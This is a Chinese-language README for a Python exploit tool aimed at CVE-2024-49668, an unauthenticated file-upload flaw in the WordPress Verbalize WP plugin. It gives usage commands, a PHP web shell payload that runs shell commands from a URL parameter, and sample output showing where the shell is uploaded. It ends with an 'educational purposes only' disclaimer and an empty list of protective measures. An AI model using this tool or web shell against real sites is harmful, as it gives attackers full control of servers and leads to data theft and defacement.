CVE-2024-49668 是 WordPress Verbalize WP 插件 1.0 及以下版本中的一个严重漏洞。该漏洞允许未经身份验证的攻击者向 Web 服务器上传任意文件(包括 Web Shell)。问题源于文件上传过程中缺乏充分的输入验证和文件类型限制。
本 Python 脚本利用 CVE-2024-49668 漏洞,通过 Verbalize WP 插件向目标 WordPress 站点上传 Shell 文件。
readme.txt 中的插件版本来验证目标站点是否存在漏洞。requests 库使用 pip 安装所需库:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
向 WordPress 站点发送 POST 请求。
options:
-h, --help 显示帮助信息并退出
-u, --url URL 目标 URL
-s, --shell SHELL 要上传的 Shell 代码
默认情况下,脚本会上传一个执行 phpinfo() 的 PHP Shell。
python CVE-2024-49668.py -u http://target.com
您也可以指定自定义的 PHP Shell 代码进行上传:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
CVE-2024-49668 漏洞使攻击者能够通过上传恶意文件完全控制目标服务器。利用此漏洞可能导致数据泄露、未经授权访问以及网站被篡改等严重后果。
为保护您的 WordPress 站点免受此漏洞的攻击,建议采取以下措施:
本工具仅用于教育目的。未经网站所有者明确许可,擅自使用此工具对网站进行攻击属于违法行为。作者不对因使用本工具造成的任何滥用或损害负责。
创建于 2025-03-22,由 Nxploited , Khaled alenazi 制作